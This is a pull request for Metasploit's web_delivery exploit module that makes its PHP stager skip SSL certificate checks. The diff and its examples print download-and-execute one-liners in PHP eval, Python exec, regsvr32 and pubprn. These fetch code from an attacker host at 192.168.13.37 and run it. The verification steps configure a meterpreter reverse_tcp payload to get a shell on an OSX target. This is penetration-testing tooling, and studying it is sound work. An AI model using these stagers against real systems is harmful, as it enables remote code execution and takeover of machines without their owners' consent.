### PR TITLE
fix #7366, ignore the ssl cert verification on PHP web_delivery

### DIFF
--- a/modules/exploits/multi/script/web_delivery.rb
+++ b/modules/exploits/multi/script/web_delivery.rb
@@ -122,7 +122,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def primer
-    php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}'));")
+    php = %Q(php -d allow_url_fopen=true -r "eval(file_get_contents('#{get_uri}', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));")
     python = %Q(python -c "import sys;import ssl;u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('#{get_uri}', context=ssl._create_unverified_context());exec(r.read());")
     regsvr = %Q(regsvr32 /s /n /u /i:#{get_uri}.sct scrobj.dll)
     pubprn = %Q(C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn.vbs 127.0.0.1 script:#{get_uri}.sct)


### PR DESCRIPTION
This changes the PHP web_delivery command to ignore invalid SSL certificates, which is required on the latest OSX (tested on Mojave 10.14.2).
Arguably this could be an option (presumably with SSL verification disabled by default?).

## Verification

List the steps needed to make sure this thing works

- [ ] `use exploit/multi/script/web_delivery`
- [ ] `set target 1`
- [ ] `set SSL true`
- [ ] `set SRVHOST 192.168.13.37`
- [ ] `set LHOST 192.168.13.37`
- [ ] `set URIPATH /` (not needed, but useful for testing/dev)
- [ ] `set payload php/meterpreter/reverse_tcp`
- [ ] `run`
- [ ] Run the output command on OSX
- [ ] **Verify** you can now get a shell

Before change:
```
$ php -d allow_url_fopen=true -r "eval(file_get_contents('https://192.168.13.37:8080/'));"

Warning: file_get_contents(): SSL operation failed with code 1. OpenSSL Error messages:
error:14090086:SSL routines:SSL3_GET_SERVER_CERTIFICATE:certificate verify failed in Command line code on line 1

Warning: file_get_contents(): Failed to enable crypto in Command line code on line 1

Warning: file_get_contents(https://192.168.13.37:8080/): failed to open stream: operation failed in Command line code on line 1
```
After change:
```
$ php -d allow_url_fopen=true -r "eval(file_get_contents('https://192.168.13.37:8080/', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"
```
:shell: 
